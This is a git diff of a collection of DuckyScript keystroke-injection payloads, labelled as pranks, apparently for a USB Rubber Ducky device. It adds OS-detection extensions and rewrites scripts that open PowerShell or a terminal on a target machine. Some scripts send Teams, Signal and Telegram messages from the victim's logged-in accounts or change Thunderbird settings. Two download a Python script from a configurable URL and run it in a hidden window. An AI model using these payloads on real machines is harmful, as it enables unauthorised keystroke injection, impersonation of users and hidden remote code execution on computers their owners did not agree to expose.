STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
|
||||
|
|
|
@ -1,29 +1,69 @@
|
|||
REM ##################################################
|
||||
REM # |
|
||||
REM # Title : Play A Song Through Spotify |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Prank |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ##################################################
|
||||
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
REM - Spotify installed and user logged-in
|
||||
REM - ExecutionPolicy Bypass
|
||||
REM_BLOCK
|
||||
##################################################
|
||||
# #
|
||||
# Title : Play A Song Through Spotify #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Prank #
|
||||
# Target : Windows 10-11 #
|
||||
# #
|
||||
##################################################
|
||||
|
||||
Requirements:
|
||||
- Internet Connection
|
||||
- Spotify installed and user logged-in
|
||||
- ExecutionPolicy Bypass
|
||||
END_REM
|
||||
|
||||
REM REQUIRED - Set your song name
|
||||
DEFINE SONG-NAME example
|
||||
DEFINE #SONG-NAME example
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRING powershell
|
||||
ENTER
|
||||
STRINGLN powershell
|
||||
DELAY 2000
|
||||
|
||||
STRINGLN Start-Process "spotify://"
|
||||
|
@ -43,8 +83,7 @@ REM Some times popups of advertisements may come out and usually they will click
|
|||
REM ESCAPE
|
||||
REM DELAY 500
|
||||
|
||||
STRING SONG-NAME
|
||||
ENTER
|
||||
STRINGLN #SONG-NAME
|
||||
DELAY 1000
|
||||
TAB
|
||||
DELAY 500
|
||||
|
|
|
@ -1,12 +1,14 @@
|
|||
REM #####################################################
|
||||
REM # #
|
||||
REM # Title : Prank In The Middle - Thunderbird #
|
||||
REM # Author : Aleff #
|
||||
REM # Version : 1.0 #
|
||||
REM # Category : Prank #
|
||||
REM # Target : Windows 10/11 #
|
||||
REM # #
|
||||
REM #####################################################
|
||||
REM_BLOCK
|
||||
#####################################################
|
||||
# #
|
||||
# Title : Prank In The Middle - Thunderbird #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Prank #
|
||||
# Target : Windows 10/11 #
|
||||
# #
|
||||
#####################################################
|
||||
END_REM
|
||||
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
|
@ -38,8 +40,7 @@ END_EXTENSION
|
|||
|
||||
REM Open Thunderbird and goto settings
|
||||
GUI r
|
||||
STRING thunderbird
|
||||
ENTER
|
||||
STRINGLN thunderbird
|
||||
DELAY 1000
|
||||
REPEAT 4 TAB
|
||||
ENTER
|
||||
|
@ -70,8 +71,7 @@ DELAY 500
|
|||
|
||||
REM Open the powershell and goto the directory
|
||||
GUI r
|
||||
STRING powershell
|
||||
ENTER
|
||||
STRINGLN powershell
|
||||
DELAY 1500
|
||||
STRING cd
|
||||
DELAY 500
|
||||
|
|
|
@ -1,37 +1,82 @@
|
|||
REM ###########################################
|
||||
REM # |
|
||||
REM # Title : Send Messages In Teams |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Prank |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ###########################################
|
||||
REM_BLOCK
|
||||
###########################################
|
||||
# #
|
||||
# Title : Send Messages In Teams #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Prank #
|
||||
# Target : Windows 10-11 #
|
||||
# #
|
||||
###########################################
|
||||
|
||||
REM Requirements:
|
||||
REM - Microsoft Teams installed and user logged-in
|
||||
REM - Internet Connection
|
||||
REM - ExecutionPolicy Bypass
|
||||
REM - Python
|
||||
Requirements:
|
||||
- Microsoft Teams installed and user logged-in
|
||||
- Internet Connection
|
||||
- ExecutionPolicy Bypass
|
||||
- Python
|
||||
|
||||
REM 1. Open a powershell
|
||||
REM 2. Close if Teams is opens and reopen it
|
||||
REM 3. Goto search bar
|
||||
REM 4. Search the person by name, email, id or what you want...
|
||||
REM 5. Downarrow and enter to open the chat
|
||||
1. Open a powershell
|
||||
2. Close if Teams is opens and reopen it
|
||||
3. Goto search bar
|
||||
4. Search the person by name, email, id or what you want...
|
||||
5. Downarrow and enter to open the chat
|
||||
END_REM
|
||||
|
||||
REM REQUIRED - Name, email, id or what you want for contact the target
|
||||
DEFINE USER-ID example
|
||||
REM REQUIRED - Messages
|
||||
DEFINE MESSAGE1 example
|
||||
REM ...
|
||||
REM DEFINE MESSAGEN example..
|
||||
DEFINE #USER-ID example
|
||||
|
||||
REM REQUIRED - Messages
|
||||
DEFINE #MESSAGE1 example
|
||||
|
||||
REM ...
|
||||
REM DEFINE #MESSAGEN example..
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRING powershell
|
||||
ENTER
|
||||
STRINGLN powershell
|
||||
DELAY 2000
|
||||
|
||||
REM #### Powershell ####
|
||||
|
@ -44,8 +89,7 @@ DELAY 10000
|
|||
REM #### Teams ####
|
||||
CTRL N
|
||||
DELAY 2000
|
||||
STRING USER-ID
|
||||
ENTER
|
||||
STRINGLN #USER-ID
|
||||
DELAY 2000
|
||||
TAB
|
||||
DELAY 1000
|
||||
|
@ -53,11 +97,10 @@ TAB
|
|||
DELAY 1000
|
||||
|
||||
REM #### Messages ####
|
||||
STRING MESSAGE1
|
||||
ENTER
|
||||
STRINGLN #MESSAGE1
|
||||
DELAY 1000
|
||||
REM ...
|
||||
REM STRINGLN MESSAGEN
|
||||
REM STRINGLN #MESSAGEN
|
||||
|
||||
DELAY 500
|
||||
ALT F4
|
||||
|
|
|
@ -1,41 +1,83 @@
|
|||
REM #########################################
|
||||
REM # |
|
||||
REM # Title : Send Signal Messages |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Prank, Execution |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM #########################################
|
||||
REM_BLOCK
|
||||
#########################################
|
||||
# #
|
||||
# Title : Send Signal Messages #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Prank, Execution #
|
||||
# Target : Windows 10-11 #
|
||||
# #
|
||||
#########################################
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
REM - Signal App installed
|
||||
REM Payload Plug-And-Play but can be edited as you want the message
|
||||
Requirements:
|
||||
- Internet Connection
|
||||
- Signal App installed
|
||||
Payload Plug-And-Play but can be edited as you want the message
|
||||
END_REM
|
||||
|
||||
REM REQUIRED - Receiver number
|
||||
DEFINE NUMBER 3332211000
|
||||
DEFINE #NUMBER 3332211000
|
||||
|
||||
REM REQUIRED - Message to send
|
||||
DEFINE MESSAGE YOUR_MESSAGE
|
||||
DEFINE #MESSAGE example
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
ENTER
|
||||
STRINGLN powershell
|
||||
DELAY 500
|
||||
STRING Stop-Process -Name "Signal"
|
||||
ENTER
|
||||
STRING Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit
|
||||
ENTER
|
||||
STRINGLN Stop-Process -Name "Signal"
|
||||
DELAY 500
|
||||
STRINGLN Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit
|
||||
DELAY 5000
|
||||
TAB
|
||||
TAB
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 100
|
||||
STRING NUMBER
|
||||
STRING #NUMBER
|
||||
DELAY 100
|
||||
TAB
|
||||
DELAY 100
|
||||
|
@ -44,8 +86,7 @@ DELAY 200
|
|||
|
||||
REM This is the message that will be sent.
|
||||
REM You can change it as you want, if you want.
|
||||
STRING YOUR_MESSAGE
|
||||
ENTER
|
||||
STRINGLN #MESSAGE
|
||||
|
||||
REM Closing Signal App
|
||||
DELAY 500
|
||||
|
|
|
@ -1,37 +1,64 @@
|
|||
REM_BLOCK
|
||||
#########################################
|
||||
# #
|
||||
# Title : Send Telegram Messages #
|
||||
# Author : Aleff #
|
||||
# Version : 1.1 #
|
||||
# Category : Prank #
|
||||
# Target : Linux #
|
||||
# #
|
||||
#########################################
|
||||
|
||||
REM #########################################
|
||||
REM # |
|
||||
REM # Title : Send Telegram Messages |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Prank |
|
||||
REM # Target : Linux |
|
||||
REM # |
|
||||
REM #########################################
|
||||
Requirements:
|
||||
- Internet Connection
|
||||
- telegram-desktop installed and activated
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
REM - telegram-desktop installed and activated
|
||||
REM Define the message receiver username
|
||||
DEFINE #USERNAME @example
|
||||
|
||||
REM Define the message(s)
|
||||
DEFINE #MESSAGE1 example
|
||||
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
|
||||
TARGETS:
|
||||
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #RESPONSE_DELAY 25
|
||||
DEFINE #ITERATION_LIMIT 120
|
||||
|
||||
VAR $C = 0
|
||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||
CAPSLOCK
|
||||
DELAY #RESPONSE_DELAY
|
||||
$C = ($C + 1)
|
||||
END_WHILE
|
||||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
|
||||
DELAY 1000
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
|
||||
STRING telegram-desktop
|
||||
ENTER
|
||||
STRINGLN telegram-desktop
|
||||
REM It depends by the computer...
|
||||
DELAY 3000
|
||||
|
||||
REM Define the message receiver username
|
||||
DEFINE USERNAME @example
|
||||
STRING USERNAME
|
||||
ENTER
|
||||
STRINGLN #USERNAME
|
||||
DELAY 500
|
||||
|
||||
REM Define the message(s)
|
||||
DEFINE MESSAGE1 example
|
||||
STRING MESSAGE1
|
||||
ENTER
|
||||
STRINGLN #MESSAGE1
|
||||
DELAY 500
|
||||
REM other messages here...
|
||||
REM ...
|
||||
|
|
|
@ -1,33 +1,70 @@
|
|||
REM ############################################
|
||||
REM # |
|
||||
REM # Title : The Mouse Moves By Itself |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Prank |
|
||||
REM # Target : Windows 10/11 |
|
||||
REM # |
|
||||
REM ############################################
|
||||
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
REM_BLOCK
|
||||
############################################
|
||||
# #
|
||||
# Title : The Mouse Moves By Itself #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Prank #
|
||||
# Target : Windows 10/11 #
|
||||
# #
|
||||
############################################
|
||||
|
||||
Requirements:
|
||||
- Internet Connection
|
||||
END_REM
|
||||
|
||||
REM REQUIRED - Set your Python script link
|
||||
DEFINE SCRIPT-PY-LINK example.com
|
||||
DEFINE #SCRIPT-PY-LINK example.com
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
ENTER
|
||||
STRINGLN powershell
|
||||
DELAY 500
|
||||
|
||||
STRING Invoke-WebRequest -Uri "
|
||||
STRING SCRIPT-PY-LINK
|
||||
STRING " -OutFile "script.py"
|
||||
ENTER
|
||||
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
|
||||
DELAY 500
|
||||
|
||||
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
|
||||
|
|
|
@ -1,15 +1,18 @@
|
|||
REM ############################################################
|
||||
REM # #
|
||||
REM # Title : This damn shell doesn't work, SO SAD! :C #
|
||||
REM # Author : Aleff #
|
||||
REM # Version : 1.0 #
|
||||
REM # Category : Prank #
|
||||
REM # Target : Linux #
|
||||
REM # #
|
||||
REM ############################################################
|
||||
REM_BLOCK
|
||||
############################################################
|
||||
# #
|
||||
# Title : This damn shell doesn't work, SO SAD! :C #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Prank #
|
||||
# Target : Linux #
|
||||
# #
|
||||
############################################################
|
||||
|
||||
Requirements:
|
||||
- Nothing <3
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Nothing <3
|
||||
REM With Kali Linux 2020.4, the new default shell is now ZSH for users who install the distribution.
|
||||
DEFINE #TARGET_KALI_LINUX TRUE
|
||||
|
||||
|
|
|
@ -1,27 +1,26 @@
|
|||
REM ####################################
|
||||
REM # |
|
||||
REM # Title : Try To Catch Me |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Prank |
|
||||
REM # Target : Windows 10/11 |
|
||||
REM # |
|
||||
REM ####################################
|
||||
REM_BLOCK
|
||||
####################################
|
||||
# #
|
||||
# Title : Try To Catch Me #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Prank #
|
||||
# Target : Windows 10/11 #
|
||||
# #
|
||||
####################################
|
||||
|
||||
|
||||
REM Requirements:
|
||||
REM - Python
|
||||
REM - Internet Connection
|
||||
Requirements:
|
||||
- Python
|
||||
- Internet Connection
|
||||
END_REM
|
||||
|
||||
REM REQUIRED - Set your Python script link
|
||||
DEFINE #SCRIPT-PY-LINK example.com
|
||||
|
||||
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
ENTER
|
||||
STRINGLN powershell
|
||||
DELAY 500
|
||||
|
||||
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
|
||||
|
|
Loading…
Reference in New Issue